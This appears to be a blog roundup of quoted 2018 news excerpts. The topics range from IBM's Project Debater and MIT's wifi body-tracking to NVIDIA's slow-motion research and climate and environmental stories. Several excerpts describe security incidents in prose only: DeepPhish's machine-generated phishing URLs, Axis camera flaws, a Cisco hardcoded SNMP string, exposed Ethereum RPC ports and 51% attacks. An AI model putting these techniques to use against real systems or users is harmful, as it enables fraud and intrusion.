IBM AI Project Debater scores 1 – 1 vs man in 2 debates

The AI, called Project Debater, appeared on stage in a packed conference room at IBM’s San Francisco office embodied in a 6ft tall black panel with a blue, animated “mouth”. It was a looming presence alongside the human debaters Noa Ovadia and Dan Zafrir, who stood behind a podium nearby.

Although the machine stumbled at many points, the unprecedented event offered a glimpse into how computers are learning to grapple with the messy, unstructured world of human decision-making.

For each of the two short debates, participants had to prepare a four-minute opening statement, followed by a four-minute rebuttal and a two-minute summary. The opening debate topic was “we should subsidize space exploration”, followed by “we should increase the use of telemedicine”.

In both debates, the audience voted Project Debater to be worse at delivery but better in terms of the amount of information it conveyed. And in spite of several robotic slip-ups, the audience voted the AI to be more persuasive (in terms of changing the audience’s position) than its human opponent, Zafrir, in the second debate.

It’s worth noting, however, that there were many members of IBM staff in the room and they may have been rooting for their creation.

IBM hopes the research will eventually enable a more sophisticated virtual assistant that can absorb massive and diverse sets of information to help build persuasive arguments and make well-informed decisions – as opposed to merely responding to simple questions and commands.

Project Debater was a showcase of IBM’s ability to process very large data sets, including millions of news articles across dozens of subjects, and then turn snippets of arguments into full flowing prose – a challenging task for a computer.

[…]

Once an AI is capable of persuasive arguments, it can be applied as a tool to aid human decision-making.

“We believe there’s massive potential for good in artificial intelligence that can understand us humans,” said Arvind Krishna, director of IBM Research.

One example of this might be corporate boardroom decisions, where there are lots of conflicting points of view. The AI system could, without emotion, listen to the conversation, take all of the evidence and arguments into account and challenge the reasoning of humans where necessary.

“This can increase the level of evidence-based decision-making,” said Reed, adding that the same system could be used for intelligence analysis in counter-terrorism, for example identifying if a particular individual represents a threat.

In both cases, the machine wouldn’t make the decision but would contribute to the discussion and act as another voice at the table.

Source: Man 1, machine 1: landmark debate between AI and humans ends in draw | Technology | The Guardian

Essentially, Project Debater assigns a confidence score to every piece of information it understands. As in: how confident is the system that it actually understands the content of what’s being discussed? “If it’s confident that it got that point right, if it really believes it understands what that opponent was saying, it’s going to try to make a very strong argument against that point specifically,” Welser explains.

”If it’s less confident,” he says, “it’ll do it’s best to make an argument that’ll be convincing as an argument even if it doesn’t exactly answer that point. Which is exactly what a human does too, sometimes.”

So: the human says that government should have specific criteria surrounding basic human needs to justify subsidization. Project Debater responds that space is awesome and good for the economy. A human might choose that tactic as a sneaky way to avoid debating on the wrong terms. Project Debater had different motivations in its algorithms, but not that different.

The point of this experiment wasn’t to make me think that I couldn’t trust that a computer is arguing in good faith — though it very much did that. No, the point is that IBM showing off that it can train AI in new areas of research that could eventually be useful in real, practical contexts.

The first is parsing a lot of information in a decision-making context. The same technology that can read a corpus of data and come up with a bunch of pros and cons for a debate could be (and has been) used to decide whether or not a stock might be worth investing in. IBM’s system didn’t make the value judgement, but it did provide a bunch of information to the bank showing both sides of a debate about the stock.

As for the debating part, Welser says that it “helps us understand how language is used,” by teaching a system to work in a rhetorical context that’s more nuanced than the usual Hey Google give me this piece of information and turn off my lights. Perhaps it might someday help a lawyer structure their arguments, “not that Project Debater would make a very good lawyer,” he joked. Another IBM researcher suggested that this technology could help judge fake news.

How close is this to being something IBM turns into a product? “This is still a research level project,” Welser says, though “the technologies underneath it right now” are already beginning to be used in IBM projects.

https://www.theverge.com/2018/6/18/17477686/ibm-project-debater-ai

The system listened to four minutes of its human opponent’s opening remarks, then parsed that data and created an argument that highlighted and attempted to debunk information shared by the opposing side. That’s incredibly impressive because it has to understand not only the words but the context of those words. Parroting back Wikipedia entries is easy, taking data and creating a narrative that’s based not only on raw data but also takes into account what it’s just heard? That’s tough.

In a world where emotion and bias colors all our decisions, Project Debater could help companies and governments see through the noise of our life experiences and produce mostly impartial conclusions. Of course, the data set it pulls from is based on what humans have written and those will have their own biases and emotion.

While the goal is an unbiased machine, during the discourse Project Debate wasn’t completely sterile. Amid its rebuttal against debater Dan Zafrir, while they argued about telemedicine expansion, the system stated that Zafrir had not told the truth during his opening statement about the increase in the use of telemedicine. In other words, it called him a liar.

When asked about the statement, Slonim said that the system has a confidence threshold during rebuttals. If it’s feeling very confident it creates a more complex statement. If it’s feeling less confident, the statement is less impressive.

https://www.engadget.com/2018/06/18/ibm-s-project-debater-is-an-ai-thats-ready-to-argue/?guccounter=1

IBM site

https://www.research.ibm.com/artificial-intelligence/project-debater/

Here’s some phish-AI research: Machine-learning code crafts phishing URLs that dodge auto-detection

An artificially intelligent system has been demonstrated generating URLs for phishing websites that appear to evade detection by security tools.

Essentially, the software can come up with URLs for webpages that masquerade as legit login pages for real websites, when in actual fact, the webpages simply collect the entered username and passwords to later hijack accounts.

Blacklists and algorithms – intelligent or otherwise – can be used to automatically identify and block links to phishing pages. Humans should be able to spot that the web links are dodgy, but not everyone is so savvy.

Using the Phishtank database, a group of computer scientists from Cyxtera Technologies, a cybersecurity biz based in Florida, USA, have built <a target=”_blank” rel=”nofollow” href=”“>DeepPhish, which is machine-learning software that, allegedly, generates phishing URLs that beat these defense mechanisms.

[…]

The team inspected more than a million URLs on Phishtank to identify three different phishing miscreants who had generated webpages to steal people’s credentials. The team fed these web addresses into AI-based phishing detection algorithm to measure how effective the URLs were at bypassing the system.

The first scumbag of the trio used 1,007 attack URLs, and only 7 were effective at avoiding setting off alarms, across 106 domains, making it successful only 0.69 per cent of the time. The second one had 102 malicious web addresses, across 19 domains. Only five of them bypassed the threat detection algorithm and it was effective 4.91 per cent of the time.

Next, they fed this information into a Long-Short Term Memory network (LSTM) to learn the general structure and extract features from the malicious URLs – for example the second threat actor commonly used “tdcanadatrustindex.html” in its address.

All the text from effective URLs were taken to create sentences and encoded into a vector and fed into the LSTM, where it is trained to predict the next character given the previous one.

Over time it learns to generate a stream of text to simulate a list of pseudo URLs that are similar to the ones used as input. When DeepPhish was trained on data from the first threat actor, it also managed to create 1,007 URLs, and 210 of them were effective at evading detection, bumping up the score from 0.69 per cent to 20.90 per cent.

When it was following the structure from the second threat actor, it also produced 102 fake URLs and 37 of them were successful, increasing the likelihood of tricking the existent defense mechanism from 4.91 per cent to 36.28 per cent.

The effectiveness rate isn’t very high as a lot of what comes out the LSTM is effective gibberish, containing strings of forbidden characters.

“It is important to automate the process of retraining the AI phishing detection system by incorporating the new synthetic URLs that each threat actor may create,” the researchers warned. ®

Source: Here’s some phish-AI research: Machine-learning code crafts phishing URLs that dodge auto-detection • The Register

EU sets up High-Level Group on Artificial Intelligence

Following an open selection process, the Commission has appointed 52 experts to a new High-Level Expert Group on Artificial Intelligence, comprising representatives from academia, civil society, as well as industry.

The High-Level Expert Group on Artificial Intelligence (AI HLG) will have as a general objective to support the implementation of the European strategy on AI. This will include the elaboration of recommendations on future AI-related policy development and on ethical, legal and societal issues related to AI, including socio-economic challenges.

Moreover, the AI HLG will serve as the steering group for the European AI Alliance’s work, interact with other initiatives, help stimulate a multi-stakeholder dialogue, gather participants’ views and reflect them in its analysis and reports.

In particular, the group will be tasked to:

  1. Advise the Commission on next steps addressing AI-related mid to long-term challenges and opportunities through recommendations which will feed into the policy development process, the legislative evaluation process and the development of a next-generation digital strategy.
  2. Propose to the Commission draft AI ethics guidelines, covering issues such as fairness, safety, transparency, the future of work, democracy and more broadly the impact on the application of the Charter of Fundamental Rights, including privacy and personal data protection, dignity, consumer protection and non-discrimination
  3. Support the Commission on further engagement and outreach mechanisms to interact with a broader set of stakeholders in the context of the AI Alliance, share information and gather their input on the group’s and the Commission’s work.

Source: High-Level Group on Artificial Intelligence | Digital Single Market

Significant Vulnerabilities in Axis Cameras – patch now!

One of the vendors for which we found vulnerable devices was Axis Communications. Our team discovered a critical chain of vulnerabilities in Axis security cameras. The vulnerabilities allow an adversary that obtained the camera’s IP address to remotely take over the cameras (via LAN or internet). In total, VDOO has responsibly disclosed seven vulnerabilities to Axis security team.

The vulnerabilities’ IDs in Mitre are: CVE-2018-10658CVE-2018-10659CVE-2018-10660CVE-2018-10661CVE-2018-10662CVE-2018-10663 and CVE-2018-10664.

Chaining three of the reported vulnerabilities together, allows an unauthenticated remote attacker that has access to the camera login page through the network (without any previous access to the camera or credentials to the camera) to fully control the affected camera. An attacker with such control could do the following:

  • Access to camera’s video stream
  • Freeze the camera’s video stream
  • Control the camera – move the lens to a desired point, turn motion detection on/off
  • Add the camera to a botnet
  • Alter the camera’s software
  • Use the camera as an infiltration point for network (performing lateral movement)
  • Render the camera useless
  • Use the camera to perform other nefarious tasks (DDoS attacks, Bitcoin mining, others)

The vulnerable products include 390 models of Axis IP Cameras. The full list of affected products can be found here. Axis uses the ACV-128401 identifier for relating to the issues we discovered.

To the best of our knowledge, these vulnerabilities were not exploited in the field, and therefore, did not lead to any concrete privacy violation or security threat to Axis’s customers.

We strongly recommend Axis customers who did not update their camera’s firmware to do so immediately or mitigate the risks in alternative ways. See instructions in FAQ section below.

We also recommend that other camera vendors follow our recommendations at the end of this report to avoid and mitigate similar threats.

Source: VDOO Discovers Significant Vulnerabilities in Axis Cameras – VDOO

Transforming Standard Video Into Slow Motion with AI

Researchers from NVIDIA developed a deep learning-based system that can produce high-quality slow-motion videos from a 30-frame-per-second video, outperforming various state-of-the-art methods that aim to do the same. The researchers will present their work at the annual Computer Vision and Pattern Recognition (CVPR) conference in Salt Lake City, Utah this week. 

“There are many memorable moments in your life that you might want to record with a camera in slow-motion because they are hard to see clearly with your eyes: the first time a baby walks, a difficult skateboard trick, a dog catching a ball,” the researchers wrote in the research paper.  “While it is possible to take 240-frame-per-second videos with a cell phone, recording everything at high frame rates is impractical, as it requires large memories and is power-intensive for mobile devices,” the team explained.

With this new research, users can slow down their recordings after taking them.

Using NVIDIA Tesla V100 GPUs and cuDNN-accelerated PyTorch deep learning framework the team trained their system on over 11,000 videos of everyday and sports activities shot at 240 frames-per-second. Once trained, the convolutional neural network predicted the extra frames.

The team used a separate dataset to validate the accuracy of their system.

The result can make videos shot at a lower frame rate look more fluid and less blurry.

“Our method can generate multiple intermediate frames that are spatially and temporally coherent,” the researchers said. “Our multi-frame approach consistently outperforms state-of-the-art single frame methods.”

To help demonstrate the research, the team took a series of clips from The Slow Mo Guys, a popular slow-motion based science and technology entertainment YouTube series created by Gavin Free, starring himself and his friend Daniel Gruchy, and made their videos even slower.

The method can take everyday videos of life’s most precious moments and slow them down to look like your favorite cinematic slow-motion scenes, adding suspense, emphasis, and anticipation.

Source: Transforming Standard Video Into Slow Motion with AI – NVIDIA Developer News CenterNVIDIA Developer News Center

Paper straw factory to open in Britain as restaurants ditch plastic

No paper straws have been made in Britain for the last several decades. But that is about to change as a group of packaging industry veterans prepare to open a dedicated paper straw production line in Ebbw Vale, Wales, making hundreds of millions of straws a year for McDonald’s and other food companies as they prepare for a ban on plastic straws in the UK.

“We spotted a huge opportunity, and we went for it,” said Mark Varney, sales and marketing director of the newly created paper straw manufacturer Transcend Packaging. “When the BBC’s Blue Planet II was on the telly and the government started talking about the dangers of plastic straws, we saw a niche in the market.”

Varney and his business partners, all stalwarts of the packaging industry, watched as chains including Costa Coffee, Wetherspoons and Pizza Express announced plans to phase out plastic straws in favour of biodegradable paper.

“It is great that all these businesses are phasing out plastic straws, but the problem for them was where to get paper ones from,” Varney said. “Everyone is having to import them from China, and when you look at the carbon footprint of that it kind of defeats the exercise.”

So Varney and his partners set about opening what they reckon will be the only paper straw production plant in Europe. “We set up this company to give the the customers what they actually want: biodegradable paper straws made in the UK,” he said.

Transcend signed a deal last week to supply straws to 1,361 McDonald’s outlets from September. The deal was agreed before Transcend has made its first straw as the company is waiting on delivery of machines from China. McDonald’s uses 1.8m straws a day in the UK. The Northern Irish factory of the Finnish packaging company Huhtamaki will also supply McDonald’s but is understood to not yet have paper straw production capabilities.

Source: Paper straw factory to open in Britain as restaurants ditch plastic | Business | The Guardian

Climate Change Can Be Reversed by Turning Air Into Gasoline

A team of scientists from Harvard University and the company Carbon Engineering announced on Thursday that they have found a method to cheaply and directly pull carbon-dioxide pollution out of the atmosphere.

[…]

the new technique is noteworthy because it promises to remove carbon dioxide cheaply. As recently as 2011, a panel of experts estimated that it would cost at least $600 to remove a metric ton of carbon dioxide from the atmosphere.

The new paper says it can remove the same ton for as little as $94, and for no more than $232. At those rates, it would cost between $1 and $2.50 to remove the carbon dioxide released by burning a gallon of gasoline in a modern car.

[…]

Their technique, while chemically complicated, does not rely on unprecedented science. In effect, Keith and his colleagues have grafted a cooling tower onto a paper mill. It has three major steps.

First, outside air is sucked into the factory’s “contactors” and exposed to an alkaline liquid. These contactors resemble industrial cooling towers: They have large fans to inhale air from the outside world, and they’re lined with corrugated plastic structures that allow as much air as possible to come into contact with the liquid. In a cooling tower, the air is meant to cool the liquid; but in this design, the air is meant to come into contact with the strong base. “CO2 is a weak acid, so it wants to be in the base,” said Keith.

Second, the now-watery liquid (containing carbon dioxide) is brought into the factory, where it undergoes a series of chemical reactions to separate the base from the acid. The liquid is frozen into solid pellets, slowly heated, and converted into a slurry. Again, these techniques have been borrowed from elsewhere in chemical industry: “Taking CO2 out of a carbonate solution is what almost every paper mill in the world does,” Keith told me.

Finally, the carbon dioxide is combined with hydrogen and converted into liquid fuels, including gasoline, diesel, and jet fuel. This is in some ways the most conventional aspect of the process: Oil companies convert hydrocarbon gases into liquid fuels every day, using a set of chemical reactions called the Fischer-Tropsch process. But it’s key to Carbon Engineering’s business: It means the company can produce carbon-neutral hydrocarbons.

What does that mean? Consider an example: If you were to burn Carbon Engineering’s gas in your car, you would release carbon-dioxide pollution out of your tailpipe and into Earth’s atmosphere. But as this carbon dioxide came from the air in the first place, these emissions would not introduce any new CO2 to the atmosphere. Nor would any new oil have to be mined to power your car.

Source: Climate Change Can Be Reversed by Turning Air Into Gasoline – The Atlantic

Customer Rewards get a lot weirder if you think of them as seperate transactions

Source: xkcd: Customer Rewards

Giant African baobab trees die suddenly after thousands of years

Some of Africa’s oldest and biggest baobab trees have abruptly died, wholly or in part, in the past decade, according to researchers.

The trees, aged between 1,100 and 2,500 years and in some cases as wide as a bus is long, may have fallen victim to climate change, the team speculated.

“We report that nine of the 13 oldest … individuals have died, or at least their oldest parts/stems have collapsed and died, over the past 12 years,” they wrote in the scientific journal Nature Plants, describing “an event of an unprecedented magnitude”.

“It is definitely shocking and dramatic to experience during our lifetime the demise of so many trees with millennial ages,” said the study’s co-author Adrian Patrut of the Babeș-Bolyai University in Romania.

Among the nine were four of the largest African baobabs. While the cause of the die-off remains unclear, the researchers “suspect that the demise of monumental baobabs may be associated at least in part with significant modifications of climate conditions that affect southern Africa in particular”.

Further research is needed, said the team from Romania, South Africa and the United States, “to support or refute this supposition”.

Between 2005 and 2017, the researchers probed and dated “practically all known very large and potentially old” African baobabs – more than 60 individuals in all. Collating data on girth, height, wood volume and age, they noted the “unexpected and intriguing fact” that most of the very oldest and biggest trees died during the study period. All were in southern Africa – Zimbabwe, Namibia, South Africa, Botswana, and Zambia.

The baobab is the biggest and longest-living flowering tree, according to the research team. It is found naturally in Africa’s savannah region and outside the continent in tropical areas to which it was introduced. It is a strange-looking plant, with branches resembling gnarled roots reaching for the sky, giving it an upside-down look.

Source: Giant African baobab trees die suddenly after thousands of years | World news | The Guardian

A.I. Can Track Human Bodies Through Walls Now, With Just a Wifi Signal

A new piece of software has been trained to use wifi signals — which pass through walls, but bounce off living tissue — to monitor the movements, breathing, and heartbeats of humans on the other side of those walls. The researchers say this new tech’s promise lies in areas like remote healthcare, particularly elder care, but it’s hard to ignore slightly more dystopian applications.

[…]

“We actually are tracking 14 different joints on the body … the head, the neck, the shoulders, the elbows, the wrists, the hips, the knees, and the feet,” Katabi said. “So you can get the full stick-figure that is dynamically moving with the individuals that are obstructed from you — and that’s something new that was not possible before.”

RF-Pose A.I. using turning machine learning and a wifi signal into X-ray vision
An animation created by the RF-Pose software as it translates a wifi signal into a visual of human motion behind a wall.

The technology works a little bit like radar, but to teach their neural network how to interpret these granular bits of human activity, the team at MIT’s Computer Science and Artificial Intelligence Laboratory (CSAIL) had to create two separate A.I.s: a student and a teacher.

[…]

the team developed one A.I. program that monitored human movements with a camera, on one side of a wall, and fed that information to their wifi X-ray A.I., called RF-Pose, as it struggled to make sense of the radio waves passing through that wall on the other side.

 

Source: A.I. Can Track Human Bodies Through Walls Now, With Just a Wifi Signal | Inverse

A machine has figured out Rubik’s Cube all by itself – using a reverse technique called autodictic iteration

In these scenarios, a deep-learning machine is given the rules of the game and then plays against itself. Crucially, it is rewarded at each step according to how it performs. This reward process is hugely important because it helps the machine to distinguish good play from bad play. In other words, it helps the machine learn.

But this doesn’t work in many real-world situations, because rewards are often rare or hard to determine.

For example, random turns of a Rubik’s Cube cannot easily be rewarded, since it is hard to judge whether the new configuration is any closer to a solution. And a sequence of random turns can go on for a long time without reaching a solution, so the end-state reward can only be offered rarely.

In chess, by contrast, there is a relatively large search space but each move can be evaluated and rewarded accordingly. That just isn’t the case for the Rubik’s Cube.

Enter Stephen McAleer and colleagues from the University of California, Irvine. These guys have pioneered a new kind of deep-learning technique, called “autodidactic iteration,” that can teach itself to solve a Rubik’s Cube with no human assistance. The trick that McAleer and co have mastered is to find a way for the machine to create its own system of rewards.

Here’s how it works. Given an unsolved cube, the machine must decide whether a specific move is an improvement on the existing configuration. To do this, it must be able to evaluate the move.

Autodidactic iteration does this by starting with the finished cube and working backwards to find a configuration that is similar to the proposed move. This process is not perfect, but deep learning helps the system figure out which moves are generally better than others.

Having been trained, the network then uses a standard search tree to hunt for suggested moves for each configuration.

The result is an algorithm that performs remarkably well. “Our algorithm is able to solve 100% of randomly scrambled cubes while achieving a median solve length of 30 moves—less than or equal to solvers that employ human domain knowledge,” say McAleer and co.

That’s interesting because it has implications for a variety of other tasks that deep learning has struggled with, including puzzles like Sokoban, games like Montezuma’s Revenge, and problems like prime number factorization.

Indeed, McAleer and co have other goals in their sights: “We are working on extending this method to find approximate solutions to other combinatorial optimization problems such as prediction of protein tertiary structure.”

Source: A machine has figured out Rubik’s Cube all by itself – MIT Technology Review

Bitcoin Price: ‘Bloody Sunday’ Not Caused by Coinrail Hack

As CCN reported, the little-known Coinrail became the latest cryptocurrency exchange to fall prey to hackers, who are said to have made off with approximately $40 million worth of tokens, a fairly pedestrian figure relative to some of the hacks seen over the years.

Later that day, the bitcoin price began to careen downwards, taking every other major cryptocurrency with it. This led some observers to draw the conclusion that the two events were linked.

Writing in market commentary made available to CCN, Greenspan said that “there is absolutely no reason why this smash and grab job at a local boutique should have sent bitcoin down by $1,000.”

While the bitcoin price did experience a small decline in the immediate aftermath of the report that an exchange had been hacked, Greenspan noted that the bulk of the decline came more than 15 hours later and that the scale of the pullback was entirely disproportionate to both the size of the hack and Coinrail’s significance in the cryptocurrency ecosystem.

bitcoin price
The bitcoin price declined after the Coinrail hack was first reported (circled), but the major drop occurred more than 15 hours later. | Source: eToro

He argued that the decline was instead a technical correction, as most of it occurred immediately after the bitcoin price broke beneath its long-term trendline and moved closer to two key support levels.

“Though the CoinRail hack may have set us off-track, I don’t think that this will have very significant ramifications in the long run,” he said. “The industry has certainly seen much bigger hacks before and other than a technical price level, this doesn’t change much for the path of the industry over the next five years.”

Source: Bitcoin Price: ‘Bloody Sunday’ Not Caused by Coinrail Hack

Hackers Stole Over $20 Million From Misconfigured Ethereum Clients

A group of hackers has stolen over $20 million worth of Ethereum from Ethereum-based apps and mining rigs, Chinese cyber-security firm Qihoo 360 Netlab reported today.

The cause of these thefts is Ethereum software applications that have been configured to expose an RPC [Remote Procedure Call] interface on port 8545.

The purpose of this interface is to provide access to a programmatic API that an approved third-party service or app can query and interact or retrieve data from the original Ethereum-based service —such as a mineror wallet application that users or companies have set up for mining or managing funds.

Because of its role, this RPC interface grants access to some pretty sensitive functions, allowing a third-party app the ability to retrieve private keys, move funds, or retrieve the owner’s personal details.

As such, this interface comes disabled by default in most apps, and is usually accompanied by a warning from the original app’s developers not to turn it on unless properly secured by an access control list (ACL), a firewall, or other authentication systems.

Almost all Ethereum-based software comes with an RPC interface nowadays, and in most cases, even when turned on, they are appropriately configured to listen to requests only via the local interface (127.0.0.1), meaning from apps running on the same machine as the original mining/wallet app that exposes the RPC interface.

Some users don’t like to read the documentation

But across the years, developers have been known to tinker with their Ethereum apps, sometimes without knowing what they are doing.

This isn’t a new issue. Months after its launch, the Ethereum Project sent out an official security advisory to warn that some of the users of the geth Ethereum mining software were running mining rigs with this interface open to remote connections, allowing attackers to steal their funds.

But despite the warning from the official Ethereum devs, users have continued to misconfigure their Ethereum clients across the years, and many have reported losing funds out of the blue, but which were later traced back to exposed RPC interfaces.

Source: Hackers Stole Over $20 Million From Misconfigured Ethereum Clients

Blockchain’s Once-Feared 51% Attack Is Now Becoming Regular among smaller coins

Monacoin, bitcoin gold, zencash, verge and now, litecoin cash.

At least five cryptocurrencies have recently been hit with an attack that used to be more theoretical than actual, all in the last month. In each case, attackers have been able to amass enough computing power to compromise these smaller networks, rearrange their transactions and abscond with millions of dollars in an effort that’s perhaps the crypto equivalent of a bank heist.

More surprising, though, may be that so-called 51% attacks are a well-known and dangerous cryptocurrency attack vector.

While there have been some instances of such attacks working successfully in the past, they haven’t exactly been all that common. They’ve been so rare, some technologists have gone as far as to argue miners on certain larger blockchains would never fall victim to one. The age-old (in crypto time) argument? It’s too costly and they wouldn’t get all that much money out of it.

But that doesn’t seem to be the case anymore.

NYU computer science researcher Joseph Bonneau released research last year featuring estimates of how much money it would cost to execute these attacks on top blockchains by simply renting power, rather than buying all the equipment.

One conclusion he drew? These attacks were likely to increase. And, it turns out he was right.

“Generally, the community thought this was a distant threat. I thought it was much less distant and have been trying to warn of the risk,” he told CoinDesk, adding:

“Even I didn’t think it would start happening this soon.”

Inside the attacks

Stepping back, cryptocurrencies aim to solve a long-standing computer science issue called the “double spend problem.”

Essentially, without creating an incentive for computers to monitor and prevent bad behavior, messaging networks were unable to act as money systems. In short, they couldn’t prevent someone from spending the same piece of data five or even 1,000 times at once (without trusting a third party to do all the dirty work).

That’s the entire reason they work as they do, with miners (a term that denotes the machines necessary to run blockchain software) consuming electricity and making sure no one’s money is getting stolen.

To make money using this attack vector, hackers need a few pieces to be in place. For one, an attacker can’t do anything they want when they’ve racked up a majority of the hashing power. But they are able to double spend transactions under certain conditions.

It wouldn’t make sense to amass all this expensive hashing power to double spend a $3 transaction on a cup of coffee. An attacker will only benefit from this investment if they’re able to steal thousands or even millions of dollars.

As such, hackers have found various clever ways of making sure the conditions are just right to make them extra money. That’s why attackers of monacoin, bitcoin gold, zencash and litecoin cash have all targeted exchanges holding millions in cryptocurrency.

By amassing more than half of the network’s hashing power, the bitcoin gold attacker was able to double spend two very expensive transactions sent to an exchange.

Through three successful attacks of zencash (a lesser-known cryptocurrency that’s a fork of a fork of privacy-minded Zcash), the attacker was able to run off with about more than 21,000 zen (the zencash token) worth well over $500,000 at the time of writing.

Though, the attack on verge was a bit different since the attacker exploited insecure rules to confuse the network into giving him or her money. Though, it’s clear the attacks targeted verge’s lower protocol layer, researchers are debating whether they technically constitute 51% attacks.

Small coins at risk

But, if these attacks were uncommon for such a long time, why are we suddenly seeing a burst of them?

In conversation with CoinDesk, researchers argued there isn’t a single, clear reason. Rather, there a number of factors that likely contributed. For example, it’s no coincidence smaller coins are the ones being attacked. Since they have attracted fewer miners, it’s easier to buy (or rent) the computing power necessary needed to build up a majority share of the network.

Further, zencash co-creator Rob Viglione argued the rise of mining marketplaces, where users can effectively rent mining hardware without buying it, setting it up and running it, has made it easier, since attackers can use it to easily buy up a ton of mining power all at once, without having to spend the time or money to set up their own miners.

Meanwhile, it’s grown easier to execute attacks as these marketplaces have amassed more hashing power.

“Hackers are now realizing it can be used to attack networks,” he said.

As a data point for this, someone even erected a website Crypto51 showing how expensive it is to 51% attack various blockchains using a mining marketplace (in this instance, one called NiceHash). Attacking bytecoin, for example, might cost as little as $719 to attack using rented computing power.

“If your savings are in a coin, or anything else, that costs less than $1 million a day to attack, you should reconsider what you are doing,” tweeted Cornell professor Emin Gün Sirer.

On the other hand, larger cryptocurrencies such as bitcoin and ethereum are harder to 51% attack because they’re much larger, requiring more hashing power than NiceHash has available.

“Bitcoin is too big and there isn’t enough spare bitcoin mining capacity sitting around to pull off the attack,” Bonneau told CoinDesk.

Source: Blockchain’s Once-Feared 51% Attack Is Now Becoming Regular – Telegraph

EU Copyright law could put end to net memes

Memes, remixes and other user-generated content could disappear online if the EU’s proposed rules on copyright become law, warn experts.

Digital rights groups are campaigning against the Copyright Directive, which the European Parliament will vote on later this month.

The legislation aims to protect rights-holders in the internet age.

But critics say it misunderstands the way people engage with web content and risks excessive censorship.

The Copyright Directive is an attempt to reshape copyright for the internet, in particular rebalancing the relationship between copyright holders and online platforms.

Article 13 states that platform providers should “take measures to ensure the functioning of agreements concluded with rights-holders for the use of their works”.

Critics say this will, in effect, require all internet platforms to filter all content put online by users, which many believe would be an excessive restriction on free speech.

There is also concern that the proposals will rely on algorithms that will be programmed to “play safe” and delete anything that creates a risk for the platform.

A campaign against Article 13 – Copyright 4 Creativity – said that the proposals could “destroy the internet as we know it”.

“Should Article 13 of the Copyright Directive be adopted, it will impose widespread censorship of all the content you share online,” it said.

It is urging users to write to their MEP ahead of the vote on 20 June.

Jim Killock, executive director of the UK’s Open Rights Group, told the BBC: “Article 13 will create a ‘Robo-copyright’ regime, where machines zap anything they identify as breaking copyright rules, despite legal bans on laws that require ‘general monitoring’ of users to protect their privacy.

“Unfortunately, while machines can spot duplicate uploads of Beyonce songs, they can’t spot parodies, understand memes that use copyright images, or make any kind of cultural judgement about what creative people are doing. We see this all too often on YouTube already.

Source: Copyright law could put end to net memes – BBC News

Cisco Removes Backdoor Account, Fourth in the Last Four Months

For the fourth time in as many months, Cisco has removed hardcoded credentials that were left inside one of its products, which an attacker could have exploited to gain access to devices and inherently to customer networks.

This time around, the hardcoded password was found in Cisco’s Wide Area Application Services (WAAS), which is a software package that runs on Cisco hardware that can optimize WAN traffic management.

Harcoded SNMP community string

This backdoor mechanism (CVE-2018-0329) was in the form of a hardcoded, read-only SNMP community string in the configuration file of the SNMP daemon.

[…]

The string came to light by accident, while security researcher Aaron Blair from RIoT Solutions was researching another WaaS vulnerability (CVE-2018-0352).

This second vulnerability was a privilege escalation in the WaaS disk check tool that allowed Blair to elevate his account’s access level from “admin” to “root.” Normally, Cisco users are permitted only admin access. The root user level grants access to the underlying OS files and is typically reserved only for Cisco engineers.

By using his newly granted root-level access, Blair says he was able to spot the hidden SNMP community string inside the /etc/snmp/snmpd.conf file.

“This string can not be discovered or disabled without access to the root filesystem, which regular administrative users do not have under normal circumstances,” Blair says.

Source: Cisco Removes Backdoor Account, Fourth in the Last Four Months

The first 3D printed houses will be built in the Netherlands this year

The city of Eindhoven soon hopes to boast the world’s first commercially-developed 3D-printed homes, an endeavor known as Project Milestone.

Artist's rendering of 3D printed home neighborhood.
Artist’s rendering of 3D printed home neighborhood. (3dprintedhouse.nl)

Construction on the first home begins this year and five houses will be on the rental market by 2019, project organizers say. Within a week of releasing images of the new homes, 20 families expressed interest in dwelling in these postmodern pods, according to the project website.

“The first aim of the project is to build five great houses that are comfortable to live in and will have happy occupants,” developers say. Beyond that, they hope to promote 3D concrete printing science and technology so that printed housing “will soon be a reality that is widely adopted.”

3D printed concrete.
3D printed concrete. (3dprintedhouses.nl)

The “printer” in this case is a big robotic arm that will shape cement of a light, whipped-cream consistency, based on an architect’s design. The cement is layered for strength.

Source: The first 3D printed houses will be built in the Netherlands this year — Quartz

Facebook gave some companies special access to data on users’ friends

Facebook granted a select group of companies special access to its users’ records even after the point in 2015 that the company has claimed it stopped sharing such data with app developers.

According to the Wall Street Journal, which cited court documents, unnamed Facebook officials and other unnamed sources, Facebook made special agreements with certain companies called “whitelists,” which gave them access to extra information about a user’s friends. This includes data such as phone numbers and “friend links,” which measure the degree of closeness between users and their friends.

These deals were made separately from the company’s data-sharing agreements with device manufacturers such as Huawei, which Facebook disclosed earlier this week after a New York Times report on the arrangement.

Source: Facebook gave some companies special access to data on users’ friends

Ticketfly exposes data on 27m customers in hack

  • Ticketfly was the target of a malicious cyber attack last week
  • In consultation with third-party forensic cybersecurity experts we can now confirm that credit and debit card information was not accessed.
  • However, information including names, addresses, email addresses and phone numbers connected to approximately 27 million Ticketfly accounts was accessed. It’s important to note that many people purchase tickets with multiple email accounts, so the number of individuals impacted is likely lower.
  • We take privacy and security very seriously and upon first learning about this incident we took swift action to secure the data of our clients and fans.
  • Ticketfly.com, Ticketfly Backstage, and the vast majority of temporary venue/promoter websites are back online.

Source: Ticketfly | Ticketfly Cyber Incident Update

The hits keep coming for Facebook: Web giant made 14m people’s private posts public

about 14 million people were affected by a bug that, for a nine-day span between May 18 and 27, caused profile posts to be set as public by default, allowing any Tom, Dick or Harriet to view the material.

“We recently found a bug that automatically suggested posting publicly when some people were creating their Facebook posts. We have fixed this issue and starting today we are letting everyone affected know and asking them to review any posts they made during that time,” Facebook chief privacy officer Erin Egan said in a statement to The Register.

Source: The hits keep coming for Facebook: Web giant made 14m people’s private posts public • The Register

VPNFilter router malware is a lot worse than everyone thought

ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE: these are the vendors newly-named by Cisco’s Talos Intelligence as being exploited by the malware scum running the VPNFilter attacks, and the attack’s been spotted hitting endpoints behind vulnerable kit.

As well as the expanded list of impacted devices, Talos warned that VPNFilter now attacks endpoints behind the firewall, and now sports a “poison pill” to destroy an infected device if necessary.

When first discovered, VPNFilter was spotted in half a million devices – but only SOHO devices from Linksys, MikroTik, Netgear, TP-Link, and QNAP storage kit.

As well as the six new vendors added to the list, Talos said more devices from Linksys, MikroTik, Netgear, and TP-Link are affected. Talos noted that to date, all the vulnerable units are consumer-grade or SOHO-grade.

All in all, it seems the early VPNFilter attacks amounted to a dry run to see if there were enough vulnerable boxen to make the effort worthwhile.

Source: VPNFilter router malware is a lot worse than everyone thought • The Register

